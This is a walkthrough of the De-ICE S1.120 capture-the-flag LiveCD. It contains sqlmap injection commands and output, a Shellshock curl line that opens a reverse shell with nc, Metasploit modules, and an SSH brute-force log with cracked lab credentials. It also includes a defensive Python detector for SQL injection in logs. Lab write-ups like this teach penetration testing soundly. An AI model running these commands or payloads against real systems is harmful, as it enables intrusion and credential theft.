While digging through an old external drive I found the De-ICE LiveCDs and walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.
Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. All of the spoilers are in the walkthrough so as not to ruin the pen testing fun. Have fun and hopefully these are helpful.
De-ICE S1.120
Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.120.iso
Default IP 192.168.1.120
Flags:
1. Create list of open ports
2. This is primarily a web penetration test; act accordingly
3. Obtain access to file system
4. Log in using brute force password
5. Perform post exploitation
6. FINAL FLAG: Rummage about in the file system
Spoilers and Walkthrough
Port scan the image to get started.
root@SNM-KScan-2:~# nmap -sV -T4 192.168.1.120
Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-07 13:53 MST
Nmap scan report for 192.168.1.120
Host is up (0.00047s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD 1.3.2
22/tcp   open  ssh      OpenSSH 5.1 (protocol 2.0)
80/tcp   open  http     Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
443/tcp  open  ssl/http Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:A4:37:1E (VMware)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.37 seconds
This is primarily a vulnerable web app, so I started working with HTML injection on the http://192.168.1.120/add_product.php page:
<h1>htmlinjection</h1>
<h1>htmlinjection1</h1>
<h1>htmlinjection2</h1>
Normally, if you can get HTML injection it is possible to get XSS, provided you can bypass whatever filter is in place. I only use the number to keep track of which injection actually worked. I used Burp to capture the request, then saved it and loaded it into sqlmap. The -r option is the request file I saved and -p is the name of the parameter to attack.
sqlmap -r /root/Desktop/deice/120webrequest -p price
No joy, so let's hit it a little harder.
sqlmap -r /root/Desktop/deice/120webrequest -p price --level=5 --risk=3
Nope, let's try the other parameters.
sqlmap -r /root/Desktop/deice/120webrequest -p product --level=5 --risk=3
sqlmap -r /root/Desktop/deice/120webrequest -p description --level=5 --risk=3
I might have busted it, but there is another parameter here you can test. Feed the id parameter to sqlmap using the --wizard option: http://192.168.1.120/products.php?id=1
sqlmap -r /root/Desktop/deice/120webrequest2 --level=5 --risk=3
root@SNM-KScan-2:~# sqlmap -r /root/Desktop/deice/120webrequest2 --level=5 --risk=3
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 14:43:07
[14:43:07] [INFO] parsing HTTP request from '/root/Desktop/deice/120webrequest2'
[14:43:07] [INFO] testing connection to the target URL
[14:43:07] [INFO] testing if the target URL is stable. This can take a couple of seconds
[14:43:08] [INFO] target URL is stable
[14:43:08] [INFO] testing if GET parameter 'id' is dynamic
[14:43:08] [INFO] confirming that GET parameter 'id' is dynamic
[14:43:08] [INFO] GET parameter 'id' is dynamic
[14:43:09] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable
[14:43:09] [INFO] testing for SQL injection on GET parameter 'id'
[14:43:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:43:10] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
BOOM goes the dynamite! Now we wait while sqlmap handles its business. If you don’t want to mess with Burp, the equivalent command is:
sqlmap --banner --dbms=mysql -u "http://192.168.1.120/products.php?id=1"
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:05:47
[09:05:47] [INFO] testing connection to the target URL
[09:05:47] [INFO] testing if the target URL is stable. This can take a couple of seconds
[09:05:48] [INFO] target URL is stable
[09:05:48] [INFO] testing if GET parameter 'id' is dynamic
[09:05:49] [INFO] confirming that GET parameter 'id' is dynamic
[09:05:49] [INFO] GET parameter 'id' is dynamic
[09:05:49] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable
[09:05:49] [INFO] testing for SQL injection on GET parameter 'id'
[09:05:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:05:49] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[09:05:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[09:05:49] [INFO] testing 'MySQL inline queries'
[09:05:49] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:05:49] [WARNING] time-based comparison requires larger statistical model, please wait..................
[09:05:50] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:06:00] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable
[09:06:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[09:06:00] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:06:00] [WARNING] reflective value(s) found and filtering out
[09:06:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 71 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1082=1082
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[09:06:14] [INFO] the back-end DBMS is MySQL
[09:06:14] [INFO] fetching banner
[09:06:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:06:14] [INFO] retrieved: 5.1.33
web application technology: Apache 2.2.11, PHP 5.2.9
back-end DBMS: MySQL 5.0.11
banner: '5.1.33'
[09:06:16] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/192.168.1.120'
[*] shutting down at 09:06:16
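The probes in the sqlmap report above (`id=1 AND 1082=1082`, `id=1 AND SLEEP(5)`, the UNION NULL tests) leave a recognisable trail in the web server's access log. The following is an added example, not part of the original walkthrough: a small detector for that trail. The log lines, the 192.168.1.131 and 192.168.1.50 clients and the `/search.php` path are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache "combined" log lines (illustrative; not captured from the lab).
SAMPLE_LOG = """\
192.168.1.130 - - [08/Jan/2015:09:05:49 -0700] "GET /products.php?id=1 HTTP/1.1" 200 1532 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.168.1.130 - - [08/Jan/2015:09:05:49 -0700] "GET /products.php?id=1%20AND%201082%3D1082 HTTP/1.1" 200 1532 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.168.1.130 - - [08/Jan/2015:09:05:55 -0700] "GET /products.php?id=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 1532 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.168.1.130 - - [08/Jan/2015:09:06:01 -0700] "GET /products.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 HTTP/1.1" 200 1490 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.168.1.131 - - [08/Jan/2015:09:06:30 -0700] "GET /products.php?id=1%20AND%204521%3D4522 HTTP/1.1" 200 1101 "-" "Mozilla/5.0"
192.168.1.50 - - [08/Jan/2015:09:07:10 -0700] "GET /products.php?id=2 HTTP/1.1" 200 1544 "-" "Mozilla/5.0"
192.168.1.50 - - [08/Jan/2015:09:07:31 -0700] "GET /search.php?q=rock+and+roll HTTP/1.1" 200 912 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# One rule per technique named in the sqlmap report; matched on DECODED values.
PAYLOAD_RULES = {
    "boolean_blind": re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+\b", re.I),
    "time_blind": re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),
    "union_select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}
# Parameters the application only ever uses as integers (assumption for this app).
NUMERIC_PARAMS = {"id"}
# Default tool user agents; trivially changed by the client, so never the only check.
SCANNER_UA = re.compile(r"\b(?:sqlmap|nikto)\b", re.I)


def classify(target, user_agent):
    """Return the set of rule names one request triggers."""
    hits = set()
    if SCANNER_UA.search(user_agent):
        hits.add("scanner_user_agent")
    # parse_qsl percent-decodes names and values, so %20AND%20 is seen as " AND ".
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for rule, pattern in PAYLOAD_RULES.items():
            if pattern.search(value):
                hits.add(rule)
        if name in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
            hits.add("non_numeric_id")
    return hits


def scan(log_text):
    """Summarise requests, flagged requests and triggered rules per client IP."""
    report = defaultdict(lambda: {"requests": 0, "flagged": 0, "rules": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        entry = report[m["ip"]]
        entry["requests"] += 1
        hits = classify(m["target"], m["ua"])
        if hits:
            entry["flagged"] += 1
            entry["rules"] |= hits
    return {
        ip: {"requests": e["requests"], "flagged": e["flagged"],
             "rules": sorted(e["rules"])}
        for ip, e in report.items()
    }


def flagged_clients(report):
    """Client IPs with at least one flagged request, sorted."""
    return sorted(ip for ip, e in report.items() if e["flagged"])


if __name__ == "__main__":
    for ip, summary in scan(SAMPLE_LOG).items():
        print(ip, summary)
```

The 192.168.1.131 line shows why the user-agent rule is only a hint: the payload and type checks still fire when the client presents a browser user agent, while the `rock and roll` search does not.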
It is time to get down on the database.
sqlmap --dbms=mysql -u "http://192.168.1.120/products.php?id=1" --users --passwords -o --threads=8 --time-sec=1
****Partial output This takes awhile****
database management system users [50]:
[*] 'aadams'@'localhost'
[*] 'aallen'@'localhost'
[*] 'aard'@'localhost'
[*] 'aharp'@'localhost'
[*] 'aheflin'@'localhost'
[*] 'amaynard'@'localhost'
[*] 'aspears'@'localhost'
[*] 'aweiland'@'localhost'
[*] 'bbanter'@'localhost'
[*] 'bphillips'@'localhost'
[*] 'bwatkins'@'localhost'
[*] 'cchisholm'@'localhost'
[*] 'ccoffee'@'localhost'
[*] 'dcooper'@'localhost'
[*] 'dgilfillan'@'localhost'
[*] 'dgrant'@'localhost'
[*] 'djohnson'@'localhost'
[*] 'dstevens'@'localhost'
[*] 'dtraylor'@'localhost'
[*] 'dwestling'@'localhost'
[*] 'hlovell'@'localhost'
[*] 'jalcantar'@'localhost'
[*] 'jalvarez'@'localhost'
[*] 'jayala'@'localhost'
[*] 'jbresnahan'@'localhost'
[*] 'jdavenport'@'localhost'
[*] 'jduff'@'localhost'
[*] 'jfranklin'@'localhost'
[*] 'kclemons'@'localhost'
[*] 'krenfro'@'localhost'
[*] 'ktso'@'localhost'
[*] 'kwebber'@'localhost'
[*] 'lmartinez'@'localhost'
[*] 'lmorales'@'localhost'
[*] 'mbryan'@'localhost'
[*] 'mholland'@'localhost'
[*] 'mnader'@'localhost'
[*] 'mrodriguez'@'localhost'
[*] 'myajima'@'localhost'
[*] 'qpowers'@'localhost'
[*] 'rdominguez'@'localhost'
[*] 'rjacobson'@'localhost'
[*] 'rpatel'@'localhost'
[*] 'sgains'@'localhost'
[*] 'sjohnson'@'localhost'
[*] 'strammel'@'localhost'
[*] 'swarren'@'localhost'
[*] 'tdeleon'@'localhost'
[*] 'tgoodchap'@'localhost'
[*] 'webapp'@'localhost'
When it retrieves the password hashes, you will be prompted to let sqlmap crack them automatically.
Just note that there are so many user names and passwords that the next couple pages are a mass spoiler.
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[09:47:24] [INFO] writing hashes to a temporary file '/tmp/sqlmaphashes-XtKh9b.txt'
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
[09:47:39] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 2
what's the custom dictionary's location?
> /usr/share/wordlists/rockyou.txt
[09:48:22] [INFO] using custom dictionary
do you want to use common password suffixes? (slow!) [y/N] N
We know that we have SQL injection, but let's hit it with Nikto also. This thing is a wreck.
root@SNM-KScan-2:~# nikto -h 192.168.1.120
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.120
+ Target Hostname: 192.168.1.120
+ Target Port: 80
+ Start Time: 2015-01-08 09:21:21 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
+ Retrieved x-powered-by header: PHP/5.2.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ mod_apreq2-20051231/2.6.0 appears to be outdated (current is at least 2.6.1)
+ mod_perl/2.0.4 appears to be outdated (current is at least 2.0.7)
+ Apache/2.2.11 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.2.11 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.2.9 appears to be outdated (current is at least 5.4.26)
+ Perl/v5.10.0 appears to be outdated (current is at least v5.14.2)
+ OpenSSL/0.9.8k appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 8429, size: 30894, mtime: Fri May 11 06:40:36 2007
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ OSVDB-3268: /webalizer/: Directory indexing found.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /cgi-bin/printenv: Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. http://www.securityfocus.com/bid/4431.
+ OSVDB-3233: /cgi-bin/test-cgi: Apache 2.0 default script is executable and reveals system information. All default scripts should be removed.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7354 requests: 0 error(s) and 25 item(s) reported on remote host
+ End Time: 2015-01-08 09:22:12 (GMT-7) (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
So I’m not giving up on Shellshock.
curl -k -H 'User-Agent: () { :;}; /bin/bash -c "nc -e /bin/bash 192.168.1.130 5005"' http://192.168.1.120/cgi-bin/printenv.cgi
Nope, no joy. Let's try some Metasploit attacks. Port 631 was listening and we have usernames and passwords.
use exploit/multi/http/cups_bash_env_exec
Even less joy. Sigh… let's just try the reversed passwords for the accounts. Our old friends ccoffee, bbanter and aadams are all there.
Module options (auxiliary/scanner/ssh/ssh_login):
   Name              Current Setting                Required  Description
   ----              ---------------                --------  -----------
   BLANK_PASSWORDS   false                          no        Try blank passwords for all users
   BRUTEFORCE_SPEED  3                              yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                          no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                          no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                          no        Add all users in the current database to the list
   PASSWORD                                         no        A specific password to authenticate with
   PASS_FILE                                        no        File containing passwords, one per line
   RHOSTS            192.168.1.120                  yes       The target address range or CIDR identifier
   RPORT             22                             yes       The target port
   STOP_ON_SUCCESS   false                          yes       Stop guessing when a credential works for a host
   THREADS           1                              yes       The number of concurrent threads
   USERNAME                                         no        A specific username to authenticate as
   USERPASS_FILE     /root/Desktop/deice/users.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                          no        Try the username as the password for all users
   USER_FILE                                        no        File containing usernames, one per line
   VERBOSE           true                           yes       Whether to print output for all attempts
msf auxiliary(ssh_login) > run
[*] 192.168.1.120:22 SSH - Starting bruteforce
[+] 192.168.1.120:22 SSH - Success: 'aadams:batman' 'uid=1003(aadams) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 1 opened (192.168.1.130:60840 -> 192.168.1.120:22) at 2015-01-08 12:28:52 -0700
[+] 192.168.1.120:22 SSH - Success: 'aallen:superman' 'uid=1031(aallen) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 2 opened (192.168.1.130:33943 -> 192.168.1.120:22) at 2015-01-08 12:28:55 -0700
[+] 192.168.1.120:22 SSH - Success: 'aard:cheese' 'uid=1000(aard) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 3 opened (192.168.1.130:49918 -> 192.168.1.120:22) at 2015-01-08 12:28:59 -0700
[+] 192.168.1.120:22 SSH - Success: 'aharp:pokemon' 'uid=1039(aharp) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 4 opened (192.168.1.130:38831 -> 192.168.1.120:22) at 2015-01-08 12:29:02 -0700
[+] 192.168.1.120:22 SSH - Success: 'aheflin:whatever' 'uid=1017(aheflin) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 5 opened (192.168.1.130:43816 -> 192.168.1.120:22) at 2015-01-08 12:29:05 -0700
[+] 192.168.1.120:22 SSH - Success: 'amaynard:kotaku' 'uid=1018(amaynard) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 6 opened (192.168.1.130:52789 -> 192.168.1.120:22) at 2015-01-08 12:29:08 -0700
[+] 192.168.1.120:22 SSH - Success: 'aspears:iloveyou' 'uid=1035(aspears) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 7 opened (192.168.1.130:47274 -> 192.168.1.120:22) at 2015-01-08 12:29:11 -0700
[+] 192.168.1.120:22 SSH - Success: 'aweiland:666666' 'uid=1032(aweiland) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 8 opened (192.168.1.130:55692 -> 192.168.1.120:22) at 2015-01-08 12:29:15 -0700
[+] 192.168.1.120:22 SSH - Success: 'bbanter:michelle' 'uid=1012(bbanter) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 9 opened (192.168.1.130:47768 -> 192.168.1.120:22) at 2015-01-08 12:29:19 -0700
[+] 192.168.1.120:22 SSH - Success: 'bphillips:123123' 'uid=1024(bphillips) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 10 opened (192.168.1.130:53612 -> 192.168.1.120:22) at 2015-01-08 12:29:22 -0700
[+] 192.168.1.120:22 SSH - Success: 'bwatkins:123456' 'uid=1037(bwatkins) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 11 opened (192.168.1.130:47820 -> 192.168.1.120:22) at 2015-01-08 12:29:26 -0700
[+] 192.168.1.120:22 SSH - Success: 'cchisholm:baseball' 'uid=1022(cchisholm) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 12 opened (192.168.1.130:54756 -> 192.168.1.120:22) at 2015-01-08 12:29:29 -0700
[+] 192.168.1.120:22 SSH - Success: 'ccoffee:0' 'uid=1044(ccoffee) gid=100(users) groups=100(users),102(admin) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 13 opened (192.168.1.130:55911 -> 192.168.1.120:22) at 2015-01-08 12:29:33 -0700
[+] 192.168.1.120:22 SSH - Success: 'dcooper:sunshine' 'uid=1036(dcooper) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 14 opened (192.168.1.130:47440 -> 192.168.1.120:22) at 2015-01-08 12:29:37 -0700
[+] 192.168.1.120:22 SSH - Success: 'dgilfillan:starwars' 'uid=1014(dgilfillan) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 15 opened (192.168.1.130:51523 -> 192.168.1.120:22) at 2015-01-08 12:29:40 -0700
[+] 192.168.1.120:22 SSH - Success: 'dgrant:letmein' 'uid=1015(dgrant) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 16 opened (192.168.1.130:43905 -> 192.168.1.120:22) at 2015-01-08 12:29:43 -0700
[+] 192.168.1.120:22 SSH - Success: 'djohnson:killer' 'uid=1011(djohnson) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 17 opened (192.168.1.130:58887 -> 192.168.1.120:22) at 2015-01-08 12:29:47 -0700
[+] 192.168.1.120:22 SSH - Success: 'dstevens:internet' 'uid=1023(dstevens) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 18 opened (192.168.1.130:42132 -> 192.168.1.120:22) at 2015-01-08 12:29:51 -0700
[+] 192.168.1.120:22 SSH - Success: 'dwestling:shadow' 'uid=1025(dwestling) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 19 opened (192.168.1.130:37133 -> 192.168.1.120:22) at 2015-01-08 12:29:54 -0700
[+] 192.168.1.120:22 SSH - Success: 'hlovell:consumer' 'uid=1021(hlovell) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 20 opened (192.168.1.130:43957 -> 192.168.1.120:22) at 2015-01-08 12:29:57 -0700
[+] 192.168.1.120:22 SSH - Success: 'jalcantar:trustno1' 'uid=1040(jalcantar) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 21 opened (192.168.1.130:36937 -> 192.168.1.120:22) at 2015-01-08 12:30:00 -0700
[+] 192.168.1.120:22 SSH - Success: 'jalvarez:password' 'uid=1013(jalvarez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 22 opened (192.168.1.130:42853 -> 192.168.1.120:22) at 2015-01-08 12:30:04 -0700
[+] 192.168.1.120:22 SSH - Success: 'jayala:abc123' 'uid=1029(jayala) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 23 opened (192.168.1.130:34358 -> 192.168.1.120:22) at 2015-01-08 12:30:07 -0700
[+] 192.168.1.120:22 SSH - Success: 'jbresnahan:blahblah' 'uid=1002(jbresnahan) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 24 opened (192.168.1.130:44168 -> 192.168.1.120:22) at 2015-01-08 12:30:10 -0700
[+] 192.168.1.120:22 SSH - Success: 'jduff:princess' 'uid=1020(jduff) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 25 opened (192.168.1.130:45406 -> 192.168.1.120:22) at 2015-01-08 12:30:14 -0700
[+] 192.168.1.120:22 SSH - Success: 'jfranklin:654321' 'uid=1027(jfranklin) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 26 opened (192.168.1.130:42125 -> 192.168.1.120:22) at 2015-01-08 12:30:17 -0700
[+] 192.168.1.120:22 SSH - Success: 'kclemons:passw0rd' 'uid=1009(kclemons) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 27 opened (192.168.1.130:50416 -> 192.168.1.120:22) at 2015-01-08 12:30:20 -0700
